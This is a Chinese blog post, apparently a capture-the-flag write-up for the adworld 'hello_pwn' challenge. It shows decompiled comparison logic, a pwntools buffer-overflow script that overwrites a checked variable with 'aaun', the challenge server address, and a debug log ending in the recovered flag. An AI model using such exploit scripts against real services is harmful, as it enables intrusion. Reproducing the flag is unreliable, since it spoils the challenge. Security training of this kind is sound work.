hello_pwn-adworld

原创

32binary 2023-08-07 21:59:53 博主文章分类：CTF ©著作权

文章标签 ubuntu linux 学习 pwn ctf 文章分类 代码人生

©著作权归作者所有：来自51CTO博客作者32binary的原创作品，请联系作者获取转载授权，否则将追究法律责任

hello_pwn-adworld

题目描述:

pwn！，segment fault！菜鸡陷入了深思

题目附件: 下载附件

题目场景:

nc 61.147.171.105 61871

100%

倒计时: 3时12分39秒

延时删除场景

hello_pwn-adworld_ubuntu

hello_pwn-adworld_pwn_02

hello_pwn-adworld_ctf_03

word_60106C == 1853186401

if ( dword_60106C == 0x6E756161 )
sub_400686();

hello_pwn-adworld_ctf_04

This point can get segment vault!

if ( dword_60106C == 0x6E756161 )
sub_400686();

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',61871)


pad=4

pause()

#ret_addr=0x0000000000400686
#num
payload=b'A'*pad+'\x61\x61\x75\x6e'

delimiter='for bof'

io.sendlineafter(delimiter,payload)
io.interactive()

#giantbranch@ubuntu:~/Desktop/study$ nc 61.147.171.105 61871  0000000000400686
#~~ welcome to ctf ~~     
#lets get helloworld for bof
#cat flag.txt
#000000000060106C
# if ( dword_60106C == 1853186401 )
#0x6e756161

giantbranch@ubuntu:~/Desktop/study$ python hello_pwn.py
[+] Opening connection to 61.147.171.105 on port 61871: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x36 bytes:
    '~~ welcome to ctf ~~     \n'
    'lets get helloworld for bof\n'
[DEBUG] Sent 0x9 bytes:
    'AAAAaaun\n'
[*] Switching to interactive mode

[DEBUG] Received 0x2d bytes:
    'cyberpeace{05ad515868cb23ffc3b2a6789998d045}\n'
cyberpeace{05ad515868cb23ffc3b2a6789998d045}
[*] Got EOF while reading in interactive
$